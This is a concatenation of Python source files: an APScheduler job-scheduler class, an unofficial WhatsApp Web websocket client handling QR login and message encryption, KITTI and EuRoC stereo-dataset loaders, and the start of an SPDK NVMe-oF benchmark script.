:param close: ``True`` to close the job store after removing it
:type alias: str
"""
self._jobstores_lock.acquire()
try:
            jobstore = self._jobstores.pop(alias, None)
            if not jobstore:
                raise KeyError('No such job store: %s' % alias)
finally:
self._jobstores_lock.release()
# Close the job store if requested
if close:
jobstore.close()
# Notify listeners that a job store has been removed
self._notify_listeners(JobStoreEvent(EVENT_JOBSTORE_REMOVED, alias))
def add_listener(self, callback, mask=EVENT_ALL):
"""
Adds a listener for scheduler events. When a matching event occurs,
``callback`` is executed with the event object as its sole argument.
If the ``mask`` parameter is not provided, the callback will receive
events of all types.
:param callback: any callable that takes one argument
:param mask: bitmask that indicates which events should be listened to
"""
self._listeners_lock.acquire()
try:
self._listeners.append((callback, mask))
finally:
self._listeners_lock.release()
def remove_listener(self, callback):
"""
Removes a previously added event listener.
"""
self._listeners_lock.acquire()
try:
for i, (cb, _) in enumerate(self._listeners):
if callback == cb:
del self._listeners[i]
finally:
self._listeners_lock.release()
def _notify_listeners(self, event):
self._listeners_lock.acquire()
try:
listeners = tuple(self._listeners)
finally:
self._listeners_lock.release()
for cb, mask in listeners:
if event.code & mask:
try:
cb(event)
except:
logger.exception('Error notifying listener')
def _real_add_job(self, job, jobstore, wakeup):
job.compute_next_run_time(datetime.now())
if not job.next_run_time:
raise ValueError('Not adding job since it would never be run')
self._jobstores_lock.acquire()
try:
try:
store = self._jobstores[jobstore]
except KeyError:
raise KeyError('No such job store: %s' % jobstore)
store.add_job(job)
finally:
self._jobstores_lock.release()
# Notify listeners that a new job has been added
event = JobStoreEvent(EVENT_JOBSTORE_JOB_ADDED, jobstore, job)
self._notify_listeners(event)
logger.debug('Added job "%s" to job store "%s"', job, jobstore)
# Notify the scheduler about the new job
if wakeup:
self._wakeup.set()
def add_job(self, trigger, func, args, kwargs, jobstore='default',
**options):
"""
Adds the given job to the job list and notifies the scheduler thread.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param trigger: trigger that determines when ``func`` is called
:param func: callable to run at the given time
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param jobstore: alias of the job store to store the job in
:rtype: :class:`~apscheduler.job.Job`
"""
job = Job(trigger, func, args or [], kwargs or {},
options.pop('misfire_grace_time', self.misfire_grace_time),
options.pop('coalesce', self.coalesce), **options)
if not self.running:
self._pending_jobs.append((job, jobstore))
logger.info('Adding job tentatively -- it will be properly '
'scheduled when the scheduler starts')
else:
self._real_add_job(job, jobstore, True)
return job
def _remove_job(self, job, alias, jobstore):
jobstore.remove_job(job)
# Notify listeners that a job has been removed
event = JobStoreEvent(EVENT_JOBSTORE_JOB_REMOVED, alias, job)
self._notify_listeners(event)
logger.info('Removed job "%s"', job)
def add_date_job(self, func, date, args=None, kwargs=None, **options):
"""
Schedules a job to be completed on a specific date and time.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run at the given time
:param date: the date/time to run the job at
:param name: name of the job
        :param jobstore: alias of the job store to store the job in
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:type date: :class:`datetime.date`
:rtype: :class:`~apscheduler.job.Job`
"""
trigger = SimpleTrigger(date)
return self.add_job(trigger, func, args, kwargs, **options)
def add_interval_job(self, func, weeks=0, days=0, hours=0, minutes=0,
seconds=0, start_date=None, args=None, kwargs=None,
**options):
"""
Schedules a job to be completed on specified intervals.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run
:param weeks: number of weeks to wait
:param days: number of days to wait
:param hours: number of hours to wait
:param minutes: number of minutes to wait
:param seconds: number of seconds to wait
:param start_date: when to first execute the job and start the
counter (default is after the given interval)
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param name: name of the job
:param jobstore: alias of the job store to add the job to
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:rtype: :class:`~apscheduler.job.Job`
"""
interval = timedelta(weeks=weeks, days=days, hours=hours,
minutes=minutes, seconds=seconds)
trigger = IntervalTrigger(interval, start_date)
return self.add_job(trigger, func, args, kwargs, **options)
def add_cron_job(self, func, year=None, month=None, day=None, week=None,
day_of_week=None, hour=None, minute=None, second=None,
start_date=None, args=None, kwargs=None, **options):
"""
Schedules a job to be completed on times that match the given
expressions.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run
:param year: year to run on
:param month: month to run on
:param day: day of month to run on
:param week: week of the year to run on
:param day_of_week: weekday to run on (0 = Monday)
        :param hour: hour to run on
        :param minute: minute to run on
        :param second: second to run on
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param name: name of the job
:param jobstore: alias of the job store to add the job to
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:return: the scheduled job
:rtype: :class:`~apscheduler.job.Job`
"""
trigger = CronTrigger(year=year, month=month, day=day, week=week,
day_of_week=day_of_week, hour=hour,
minute=minute, second=second,
start_date=start_date)
return self.add_job(trigger, func, args, kwargs, **options)
def cron_schedule(self, **options):
"""
Decorator version of :meth:`add_cron_job`.
This decorator does not wrap its host function.
Unscheduling decorated functions is possible by passing the ``job``
attribute of the scheduled function to :meth:`unschedule_job`.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
"""
def inner(func):
func.job = self.add_cron_job(func, **options)
return func
return inner
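    # Illustrative use of the decorator (hedged; 'sched' is an assumed
    # Scheduler instance and the cron fields are made up):
    #   @sched.cron_schedule(day='last sun')
    #   def some_task():
    #       print('Runs at midnight on the last Sunday of every month')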
def interval_schedule(self, **options):
"""
Decorator version of :meth:`add_interval_job`.
This decorator does not wrap its host function.
Unscheduling decorated functions is possible by passing the ``job``
attribute of the scheduled function to :meth:`unschedule_job`.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
"""
def inner(func):
func.job = self.add_interval_job(func, **options)
return func
return inner
def get_jobs(self):
"""
Returns a list of all scheduled jobs.
:return: list of :class:`~apscheduler.job.Job` objects
"""
self._jobstores_lock.acquire()
try:
jobs = []
for jobstore in itervalues(self._jobstores):
jobs.extend(jobstore.jobs)
return jobs
finally:
self._jobstores_lock.release()
def unschedule_job(self, job):
"""
Removes a job, preventing it from being run any more.
"""
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
if job in list(jobstore.jobs):
self._remove_job(job, alias, jobstore)
return
finally:
self._jobstores_lock.release()
raise KeyError('Job "%s" is not scheduled in any job store' % job)
def unschedule_func(self, func):
"""
Removes all jobs that would execute the given function.
"""
found = False
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
for job in list(jobstore.jobs):
if job.func == func:
self._remove_job(job, alias, jobstore)
found = True
finally:
self._jobstores_lock.release()
if not found:
raise KeyError('The given function is not scheduled in this '
'scheduler')
def print_jobs(self, out=None):
"""
Prints out a textual listing of all jobs currently scheduled on this
scheduler.
:param out: a file-like object to print to (defaults to **sys.stdout**
if nothing is given)
"""
out = out or sys.stdout
job_strs = []
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
job_strs.append('Jobstore %s:' % alias)
if jobstore.jobs:
for job in jobstore.jobs:
job_strs.append(' %s' % job)
else:
job_strs.append(' No scheduled jobs')
finally:
self._jobstores_lock.release()
out.write(os.linesep.join(job_strs) + os.linesep)
def _run_job(self, job, run_times):
"""
Acts as a harness that runs the actual job code in a thread.
"""
for run_time in run_times:
# See if the job missed its run time window, and handle possible
# misfires accordingly
difference = datetime.now() - run_time
grace_time = timedelta(seconds=job.misfire_grace_time)
if difference > grace_time:
# Notify listeners about a missed run
event = JobEvent(EVENT_JOB_MISSED, job, run_time)
self._notify_listeners(event)
logger.warning('Run time of job "%s" was missed by %s',
job, difference)
else:
try:
job.add_instance()
except MaxInstancesReachedError:
event = JobEvent(EVENT_JOB_MISSED, job, run_time)
self._notify_listeners(event)
logger.warning('Execution of job "%s" skipped: '
'maximum number of running instances '
'reached (%d)', job, job.max_instances)
break
logger.debug('Running job "%s" (scheduled at %s)', job,
run_time)
try:
retval = job.func(*job.args, **job.kwargs)
except:
# Notify listeners about the exception
exc, tb = sys.exc_info()[1:]
event = JobEvent(EVENT_JOB_ERROR, job, run_time,
exception=exc, traceback=tb)
self._notify_listeners(event)
logger.exception('Job "%s" raised an exception', job)
else:
# Notify listeners about successful execution
event = JobEvent(EVENT_JOB_EXECUTED, job, run_time,
retval=retval)
self._notify_listeners(event)
logger.debug('Job "%s" executed successfully', job)
job.remove_instance()
# If coalescing is enabled, don't attempt any further runs
if job.coalesce:
break
def _process_jobs(self, now):
"""
Iterates through jobs in every jobstore, starts pending jobs
and figures out the next wakeup time.
"""
next_wakeup_time = None
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
for job in tuple(jobstore.jobs):
run_times = job.get_run_times(now)
if run_times:
logger.debug('Scheduler submitting job %s to run', job.name)
self._threadpool.submit(self._run_job, job, run_times)
# Increase the job's run count
if job.coalesce:
job.runs += 1
else:
job.runs += len(run_times)
# Update the job, but don't keep finished jobs around
if job.compute_next_run_time(
now + timedelta(microseconds=1)):
jobstore.update_job(job)
else:
self._remove_job(job, alias, jobstore)
if not next_wakeup_time:
next_wakeup_time = job.next_run_time
elif job.next_run_time:
next_wakeup_time = min(next_wakeup_time,
job.next_run_time)
return next_wakeup_time
finally:
self._jobstores_lock.release()
def _main_loop(self):
"""Executes jobs on schedule."""
logger.debug('Scheduler started')
self._notify_listeners(SchedulerEvent(EVENT_SCHEDULER_START))
self._wakeup.clear()
while not self._stopped:
logger.debug('Looking for jobs to run')
now = datetime.now()
next_wakeup_time = self._process_jobs(now)
# Sleep until the next job is scheduled to be run,
# a new job is added or the scheduler is stopped
if next_wakeup_time is not None:
wait_seconds = time_difference(next_wakeup_time, now)
logger.debug('Next wakeup is due at %s (in %f seconds)',
next_wakeup_time, wait_seconds)
try:
self._wakeup.wait(wait_seconds)
except IOError: # Catch errno 514 on some Linux kernels
pass
self._wakeup.clear()
elif self.standalone:
logger.debug('No jobs left; shutting down scheduler')
self.shutdown()
break
else:
logger.debug('No jobs; waiting until a job is added')
try:
self._wakeup.wait()
except IOError: # Catch errno 514 on some Linux kernels
pass
self._wakeup.clear()
logger.info('Scheduler has been shut down')
self._notify_listeners(SchedulerEvent(EVENT_SCHEDULER_SHUTDOWN))
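# A minimal standalone usage sketch (hedged: the tick job and the 3-second
# interval are illustrative, not part of the library):
if __name__ == '__main__':
    def tick():
        print('Tick! The time is %s' % datetime.now())

    sched = Scheduler(standalone=True)
    sched.add_interval_job(tick, seconds=3)
    try:
        sched.start()  # blocks in standalone mode
    except (KeyboardInterrupt, SystemExit):
        sched.shutdown()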
|
whatsapp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys;
sys.dont_write_bytecode = True;
import os;
import signal;
import base64;
from threading import Thread, Timer
import math;
import time;
import datetime;
import json;
import io;
from time import sleep;
from threading import Thread;
from Crypto.Cipher import AES;
from Crypto.Hash import SHA256;
import hashlib;
import binascii;
from Crypto import Random; # needed by sendTextMessage below
import hmac;
import traceback;
import websocket;
import curve25519;
import pyqrcode;
from utilities import *;
from whatsapp_binary_reader import whatsappReadBinary;
WHATSAPP_WEB_VERSION="0,4,2081"
reload(sys);
sys.setdefaultencoding("utf-8");
def HmacSha256(key, sign):
return hmac.new(key, sign, hashlib.sha256).digest();
def HKDF(key, length, appInfo=""): # implements RFC 5869, some parts from https://github.com/MirkoDziadzka/pyhkdf
key = HmacSha256("\0"*32, key);
keyStream = "";
keyBlock = "";
blockIndex = 1;
while len(keyStream) < length:
keyBlock = hmac.new(key, msg=keyBlock+appInfo+chr(blockIndex), digestmod=hashlib.sha256).digest();
blockIndex += 1;
keyStream += keyBlock;
return keyStream[:length];
def AESPad(s):
bs = AES.block_size;
return s + (bs - len(s) % bs) * chr(bs - len(s) % bs);
def to_bytes(n, length, endianess='big'):
h = '%x' % n
s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex')
return s if endianess == 'big' else s[::-1]
def AESUnpad(s):
return s[:-ord(s[len(s)-1:])];
def AESEncrypt(key, plaintext): # like "AESPad"/"AESUnpad" from https://stackoverflow.com/a/21928790
plaintext = AESPad(plaintext);
iv = os.urandom(AES.block_size);
cipher = AES.new(key, AES.MODE_CBC, iv);
return iv + cipher.encrypt(plaintext);
def WhatsAppEncrypt(encKey, macKey, plaintext):
enc = AESEncrypt(encKey, plaintext)
return HmacSha256(macKey, enc) + enc; # this may need padding to 64 byte boundary
def AESDecrypt(key, ciphertext): # from https://stackoverflow.com/a/20868265
iv = ciphertext[:AES.block_size];
cipher = AES.new(key, AES.MODE_CBC, iv);
plaintext = cipher.decrypt(ciphertext[AES.block_size:]);
return AESUnpad(plaintext);
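# Hedged self-test of the crypto helpers above; runs only when this module is
# executed directly, using random throwaway key material:
if __name__ == "__main__":
    demo_key = os.urandom(32);
    # 80 bytes = 32-byte enc key + 32-byte mac key + 16 extra bytes
    assert len(HKDF(demo_key, 80)) == 80;
    demo_ct = AESEncrypt(demo_key, "hello world");
    assert AESDecrypt(demo_key, demo_ct) == "hello world";
    assert to_bytes(255, 2) == "\x00\xff";
    print("crypto helper self-test passed");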
class WhatsAppWebClient:
websocketIsOpened = False;
onOpenCallback = None;
onMessageCallback = None;
onCloseCallback = None;
activeWs = None;
messageSentCount = 0;
websocketThread = None;
messageQueue = {}; # maps message tags (provided by WhatsApp) to more information (description and callback)
loginInfo = {
"clientId": None,
"serverRef": None,
"privateKey": None,
"publicKey": None,
"key": {
"encKey": None,
"macKey": None
}
};
connInfo = {
"clientToken": None,
"serverToken": None,
"browserToken": None,
"secret": None,
"sharedSecret": None,
"me": None
};
def __init__(self, onOpenCallback, onMessageCallback, onCloseCallback):
self.onOpenCallback = onOpenCallback;
self.onMessageCallback = onMessageCallback;
self.onCloseCallback = onCloseCallback;
websocket.enableTrace(True);
self.connect();
def onOpen(self, ws):
try:
self.websocketIsOpened = True;
if self.onOpenCallback is not None and "func" in self.onOpenCallback:
self.onOpenCallback["func"](self.onOpenCallback);
eprint("WhatsApp backend Websocket opened.");
except:
eprint(traceback.format_exc());
def onError(self, ws, error):
eprint(error);
def onClose(self, ws):
self.websocketIsOpened = False;
if self.onCloseCallback is not None and "func" in self.onCloseCallback:
self.onCloseCallback["func"](self.onCloseCallback);
eprint("WhatsApp backend Websocket closed.");
def onMessage(self, ws, message):
try:
messageSplit = message.split(",", 1);
messageTag = messageSplit[0];
messageContent = messageSplit[1];
if messageTag in self.messageQueue: # when the server responds to a client's message
pend = self.messageQueue[messageTag];
if pend["desc"] == "_status":
                    # the reply to ["admin","test"] is a JSON array like ["Pong", true]
                    statusJson = json.loads(messageContent);
                    if statusJson[0] == 'Pong' and statusJson[1] == True:
                        pend["callback"]({"Connected": True, "user": self.connInfo["me"], "pushname": self.connInfo.get("pushname")});
elif pend["desc"] == "_restoresession":
eprint("") # TODO implement Challenge Solving
elif pend["desc"] == "_login":
eprint("Message after login: ", message);
self.loginInfo["serverRef"] = json.loads(messageContent)["ref"];
eprint("set server id: " + self.loginInfo["serverRef"]);
self.loginInfo["privateKey"] = curve25519.Private();
self.loginInfo["publicKey"] = self.loginInfo["privateKey"].get_public();
qrCodeContents = self.loginInfo["serverRef"] + "," + base64.b64encode(self.loginInfo["publicKey"].serialize()) + "," + self.loginInfo["clientId"];
eprint("qr code contents: " + qrCodeContents);
svgBuffer = io.BytesIO(); # from https://github.com/mnooner256/pyqrcode/issues/39#issuecomment-207621532
pyqrcode.create(qrCodeContents, error='L').svg(svgBuffer, scale=6, background="rgba(0,0,0,0.0)", module_color="#122E31", quiet_zone=0);
if "callback" in pend and pend["callback"] is not None and "func" in pend["callback"] and pend["callback"]["func"] is not None and "tag" in pend["callback"] and pend["callback"]["tag"] is not None:
pend["callback"]["func"]({ "type": "generated_qr_code", "image": "data:image/svg+xml;base64," + base64.b64encode(svgBuffer.getvalue()), "content": qrCodeContents }, pend["callback"]);
else:
try:
jsonObj = json.loads(messageContent); # try reading as json
except ValueError, e:
if messageContent != "":
hmacValidation = HmacSha256(self.loginInfo["key"]["macKey"], messageContent[32:]);
if hmacValidation != messageContent[:32]:
raise ValueError("Hmac mismatch");
decryptedMessage = AESDecrypt(self.loginInfo["key"]["encKey"], messageContent[32:]);
try:
processedData = whatsappReadBinary(decryptedMessage, True);
messageType = "binary";
except:
processedData = { "traceback": traceback.format_exc().splitlines() };
messageType = "error";
finally:
self.onMessageCallback["func"](processedData, self.onMessageCallback, { "message_type": messageType });
else:
self.onMessageCallback["func"](jsonObj, self.onMessageCallback, { "message_type": "json" });
if isinstance(jsonObj, list) and len(jsonObj) > 0: # check if the result is an array
eprint(json.dumps(jsonObj));
if jsonObj[0] == "Conn":
Timer(25, lambda: self.activeWs.send('?,,')).start() # Keepalive Request
self.connInfo["clientToken"] = jsonObj[1]["clientToken"];
self.connInfo["serverToken"] = jsonObj[1]["serverToken"];
self.connInfo["browserToken"] = jsonObj[1]["browserToken"];
self.connInfo["me"] = jsonObj[1]["wid"];
self.connInfo["secret"] = base64.b64decode(jsonObj[1]["secret"]);
self.connInfo["sharedSecret"] = self.loginInfo["privateKey"].get_shared_key(curve25519.Public(self.connInfo["secret"][:32]), lambda a: a);
sse = self.connInfo["sharedSecretExpanded"] = HKDF(self.connInfo["sharedSecret"], 80);
hmacValidation = HmacSha256(sse[32:64], self.connInfo["secret"][:32] + self.connInfo["secret"][64:]);
if hmacValidation != self.connInfo["secret"][32:64]:
raise ValueError("Hmac mismatch");
keysEncrypted = sse[64:] + self.connInfo["secret"][64:];
keysDecrypted = AESDecrypt(sse[:32], keysEncrypted);
self.loginInfo["key"]["encKey"] = keysDecrypted[:32];
self.loginInfo["key"]["macKey"] = keysDecrypted[32:64];
# eprint("private key : ", base64.b64encode(self.loginInfo["privateKey"].serialize()));
# eprint("secret : ", base64.b64encode(self.connInfo["secret"]));
# eprint("shared secret : ", base64.b64encode(self.connInfo["sharedSecret"]));
# eprint("shared secret expanded : ", base64.b64encode(self.connInfo["sharedSecretExpanded"]));
# eprint("hmac validation : ", base64.b64encode(hmacValidation));
# eprint("keys encrypted : ", base64.b64encode(keysEncrypted));
# eprint("keys decrypted : ", base64.b64encode(keysDecrypted));
eprint("set connection info: client, server and browser token; secret, shared secret, enc key, mac key");
eprint("logged in as " + jsonObj[1]["pushname"] + " (" + jsonObj[1]["wid"] + ")");
elif jsonObj[0] == "Stream":
pass;
elif jsonObj[0] == "Props":
pass;
except:
eprint(traceback.format_exc());
def connect(self):
self.activeWs = websocket.WebSocketApp("wss://web.whatsapp.com/ws",
on_message = lambda ws, message: self.onMessage(ws, message),
on_error = lambda ws, error: self.onError(ws, error),
on_open = lambda ws: self.onOpen(ws),
on_close = lambda ws: self.onClose(ws),
header = { "Origin: https://web.whatsapp.com" });
self.websocketThread = Thread(target = self.activeWs.run_forever);
self.websocketThread.daemon = True;
self.websocketThread.start();
def generateQRCode(self, callback=None):
self.loginInfo["clientId"] = base64.b64encode(os.urandom(16));
messageTag = str(getTimestamp());
self.messageQueue[messageTag] = { "desc": "_login", "callback": callback };
message = messageTag + ',["admin","init",['+ WHATSAPP_WEB_VERSION + '],["Chromium at ' + datetime.datetime.now().isoformat() + '","Chromium"],"' + self.loginInfo["clientId"] + '",true]';
self.activeWs.send(message);
def restoreSession(self, callback=None):
messageTag = str(getTimestamp())
message = messageTag + ',["admin","init",['+ WHATSAPP_WEB_VERSION + '],["Chromium at ' + datetime.now().isoformat() + '","Chromium"],"' + self.loginInfo["clientId"] + '",true]'
self.activeWs.send(message)
messageTag = str(getTimestamp())
self.messageQueue[messageTag] = {"desc": "_restoresession"}
message = messageTag + ',["admin","login","' + self.connInfo["clientToken"] + '", "' + self.connInfo[
"serverToken"] + '", "' + self.loginInfo["clientId"] + '", "takeover"]'
self.activeWs.send(message)
def getLoginInfo(self, callback):
callback["func"]({ "type": "login_info", "data": self.loginInfo }, callback);
def getConnectionInfo(self, callback):
callback["func"]({ "type": "connection_info", "data": self.connInfo }, callback);
def sendTextMessage(self, number, text):
messageId = "3EB0"+binascii.hexlify(Random.get_random_bytes(8)).upper()
messageTag = str(getTimestamp())
messageParams = {"key": {"fromMe": True, "remoteJid": number + "@s.whatsapp.net", "id": messageId},"messageTimestamp": getTimestamp(), "status": 1, "message": {"conversation": text}}
msgData = ["action", {"type": "relay", "epoch": str(self.messageSentCount)},[["message", None, WAWebMessageInfo.encode(messageParams)]]]
encryptedMessage = WhatsAppEncrypt(self.loginInfo["key"]["encKey"], self.loginInfo["key"]["macKey"],whatsappWriteBinary(msgData))
payload = bytearray(messageId) + bytearray(",") + bytearray(to_bytes(WAMetrics.MESSAGE, 1)) + bytearray([0x80]) + encryptedMessage
self.messageSentCount = self.messageSentCount + 1
self.messageQueue[messageId] = {"desc": "__sending"}
self.activeWs.send(payload, websocket.ABNF.OPCODE_BINARY)
def status(self, callback=None):
if self.activeWs is not None:
messageTag = str(getTimestamp())
self.messageQueue[messageTag] = {"desc": "_status", "callback": callback}
message = messageTag + ',["admin", "test"]'
self.activeWs.send(message)
def disconnect(self):
self.activeWs.send('goodbye,,["admin","Conn","disconnect"]'); # WhatsApp server closes connection automatically when client wants to disconnect
#time.sleep(0.5);
#self.activeWs.close();
|
dataset.py
|
import numpy as np
import cv2
import os
import time
from collections import defaultdict, namedtuple
from threading import Thread, Lock
from multiprocessing import Process, Queue
class ImageReader(object):
def __init__(self, ids, timestamps, cam=None):
self.ids = ids
self.timestamps = timestamps
self.cam = cam
self.cache = dict()
self.idx = 0
self.ahead = 10 # 10 images ahead of current index
self.waiting = 1.5 # waiting time
self.preload_thread = Thread(target=self.preload)
self.thread_started = False
def read(self, path):
img = cv2.imread(path, -1)
if self.cam is None:
return img
else:
return self.cam.rectify(img)
def preload(self):
idx = self.idx
t = float('inf')
while True:
if time.time() - t > self.waiting:
return
if self.idx == idx:
time.sleep(1e-2)
continue
for i in range(self.idx, self.idx + self.ahead):
if i not in self.cache and i < len(self.ids):
self.cache[i] = self.read(self.ids[i])
if self.idx + self.ahead > len(self.ids):
return
idx = self.idx
t = time.time()
def __len__(self):
return len(self.ids)
def __getitem__(self, idx):
self.idx = idx
# if not self.thread_started:
# self.thread_started = True
# self.preload_thread.start()
if idx in self.cache:
img = self.cache[idx]
del self.cache[idx]
else:
img = self.read(self.ids[idx])
return img
def __iter__(self):
for i, timestamp in enumerate(self.timestamps):
yield timestamp, self[i]
@property
def dtype(self):
return self[0].dtype
@property
def shape(self):
return self[0].shape
class KITTIOdometry(object): # without lidar
'''
path example: 'path/to/your/KITTI odometry dataset/sequences/00'
'''
def __init__(self, path):
Cam = namedtuple('cam', 'fx fy cx cy width height baseline')
cam00_02 = Cam(718.856, 718.856, 607.1928, 185.2157, 1241, 376, 0.5371657)
cam03 = Cam(721.5377, 721.5377, 609.5593, 172.854, 1242, 375, 0.53715)
cam04_12 = Cam(707.0912, 707.0912, 601.8873, 183.1104, 1226, 370, 0.53715)
path = os.path.expanduser(path)
self.left, self.right, self.timestamps = self.load_images(path)
assert len(self.left) == len(self.right)
sequence = int(path.strip(os.path.sep).split(os.path.sep)[-1])
if sequence < 3:
self.cam = cam00_02
elif sequence == 3:
self.cam = cam03
elif sequence < 13:
self.cam = cam04_12
def load_images(self, path_to_sequence):
timestamps = []
with open(os.path.join(path_to_sequence, 'times.txt')) as times_file:
for line in times_file:
if len(line) > 0:
timestamps.append(float(line))
return [
os.path.join(path_to_sequence, 'image_2', "{0:06}.png".format(idx))
for idx in range(len(timestamps))
], [
os.path.join(path_to_sequence, 'image_3', "{0:06}.png".format(idx))
for idx in range(len(timestamps))
], timestamps
def __len__(self):
return len(self.left)
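# Hedged usage sketch (the sequence path is hypothetical):
#   seq = KITTIOdometry('~/data/KITTI/odometry/sequences/00')
#   left_images = ImageReader(seq.left, seq.timestamps)
#   timestamp, img = next(iter(left_images))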
class Camera(object):
def __init__(self,
width, height,
intrinsic_matrix,
undistort_rectify=False,
extrinsic_matrix=None,
distortion_coeffs=None,
rectification_matrix=None,
projection_matrix=None):
self.width = width
self.height = height
self.intrinsic_matrix = intrinsic_matrix
self.extrinsic_matrix = extrinsic_matrix
self.distortion_coeffs = distortion_coeffs
self.rectification_matrix = rectification_matrix
self.projection_matrix = projection_matrix
self.undistort_rectify = undistort_rectify
self.fx = intrinsic_matrix[0, 0]
self.fy = intrinsic_matrix[1, 1]
self.cx = intrinsic_matrix[0, 2]
self.cy = intrinsic_matrix[1, 2]
if undistort_rectify:
self.remap = cv2.initUndistortRectifyMap(
cameraMatrix=self.intrinsic_matrix,
distCoeffs=self.distortion_coeffs,
R=self.rectification_matrix,
newCameraMatrix=self.projection_matrix,
size=(width, height),
m1type=cv2.CV_8U)
else:
self.remap = None
def rectify(self, img):
if self.remap is None:
return img
else:
return cv2.remap(img, *self.remap, cv2.INTER_LINEAR)
class StereoCamera(object):
def __init__(self, left_cam, right_cam):
self.left_cam = left_cam
self.right_cam = right_cam
self.width = left_cam.width
self.height = left_cam.height
self.intrinsic_matrix = left_cam.intrinsic_matrix
self.extrinsic_matrix = left_cam.extrinsic_matrix
self.fx = left_cam.fx
self.fy = left_cam.fy
self.cx = left_cam.cx
self.cy = left_cam.cy
self.baseline = abs(right_cam.projection_matrix[0, 3] /
right_cam.projection_matrix[0, 0])
self.focal_baseline = self.fx * self.baseline
class EuRoCDataset(object): # Stereo + IMU
'''
path example: 'path/to/your/EuRoC Mav dataset/MH_01_easy'
'''
def __init__(self, path, rectify=True):
self.left_cam = Camera(
width=752, height=480,
intrinsic_matrix = np.array([
[458.654, 0.000000, 367.215],
[0.000000, 457.296, 248.375],
[0.000000, 0.000000, 1.000000]]),
undistort_rectify=rectify,
distortion_coeffs = np.array(
[-0.28340811, 0.07395907, 0.00019359, 1.76187114e-05, 0.000000]),
rectification_matrix = np.array([
[0.999966347530033, -0.001422739138722922, 0.008079580483432283],
[0.001365741834644127, 0.9999741760894847, 0.007055629199258132],
[-0.008089410156878961, -0.007044357138835809, 0.9999424675829176]]),
projection_matrix = np.array([
[435.2046959714599, 0, 367.4517211914062, 0],
[0, 435.2046959714599, 252.2008514404297, 0],
[0., 0, 1, 0]]),
extrinsic_matrix = np.array([
[0.0148655429818, -0.999880929698, 0.00414029679422, -0.0216401454975],
[0.999557249008, 0.0149672133247, 0.025715529948, -0.064676986768],
[-0.0257744366974, 0.00375618835797, 0.999660727178, 0.00981073058949],
[0.0, 0.0, 0.0, 1.0]])
)
self.right_cam = Camera(
width=752, height=480,
intrinsic_matrix = np.array([
[457.587, 0.000000, 379.999],
[0.000000, 456.134, 255.238],
[0.000000, 0.000000, 1.000000]]),
undistort_rectify=rectify,
distortion_coeffs = np.array(
[-0.28368365, 0.07451284, -0.00010473, -3.555907e-05, 0.0]),
rectification_matrix = np.array([
[0.9999633526194376, -0.003625811871560086, 0.007755443660172947],
[0.003680398547259526, 0.9999684752771629, -0.007035845251224894],
[-0.007729688520722713, 0.007064130529506649, 0.999945173484644]]),
projection_matrix = np.array([
[435.2046959714599, 0, 367.4517211914062, -47.90639384423901],
[0, 435.2046959714599, 252.2008514404297, 0],
[0, 0, 1, 0]]),
extrinsic_matrix = np.array([
[0.0125552670891, -0.999755099723, 0.0182237714554, -0.0198435579556],
[0.999598781151, 0.0130119051815, 0.0251588363115, 0.0453689425024],
[-0.0253898008918, 0.0179005838253, 0.999517347078, 0.00786212447038],
[0.0, 0.0, 0.0, 1.0]])
)
path = os.path.expanduser(path)
self.left = ImageReader(
*self.list_imgs(os.path.join(path, 'mav0', 'cam0', 'data')),
self.left_cam)
self.right = ImageReader(
*self.list_imgs(os.path.join(path, 'mav0', 'cam1', 'data')),
self.right_cam)
assert len(self.left) == len(self.right)
self.timestamps = self.left.timestamps
self.cam = StereoCamera(self.left_cam, self.right_cam)
def list_imgs(self, dir):
xs = [_ for _ in os.listdir(dir) if _.endswith('.png')]
xs = sorted(xs, key=lambda x:float(x[:-4]))
timestamps = [float(_[:-4]) * 1e-9 for _ in xs]
return [os.path.join(dir, _) for _ in xs], timestamps
def __len__(self):
return len(self.left)
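# --- Example (illustrative only): walking a EuRoC sequence. ---
# Assumes the standard EuRoC MAV layout, that ImageReader supports integer
# indexing, and that it returns numpy images; the path below is made up.
def _demo_iterate_euroc():
    dataset = EuRoCDataset('~/data/EuRoC/MH_01_easy')
    for i in range(len(dataset)):
        left, right = dataset.left[i], dataset.right[i]  # rectified images
        timestamp = dataset.timestamps[i]                # seconds as float
        print(i, timestamp, left.shape, right.shape)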
|
run_nvmf.py
|
#!/usr/bin/env python3
import os
import re
import sys
import json
import paramiko
import zipfile
import threading
import subprocess
import itertools
import time
import uuid
import rpc
import rpc.client
from common import *
class Server:
def __init__(self, name, username, password, mode, nic_ips, transport):
self.name = name
self.mode = mode
self.username = username
self.password = password
self.nic_ips = nic_ips
self.transport = transport.lower()
if not re.match("^[A-Za-z0-9]*$", name):
self.log_print("Please use a name which contains only letters or numbers")
sys.exit(1)
def log_print(self, msg):
print("[%s] %s" % (self.name, msg), flush=True)
class Target(Server):
def __init__(self, name, username, password, mode, nic_ips, transport="rdma", use_null_block=False, sar_settings=None):
super(Target, self).__init__(name, username, password, mode, nic_ips, transport)
self.null_block = bool(use_null_block)
self.enable_sar = False
if sar_settings:
self.enable_sar, self.sar_delay, self.sar_interval, self.sar_count = sar_settings
self.script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
self.spdk_dir = os.path.abspath(os.path.join(self.script_dir, "../../../"))
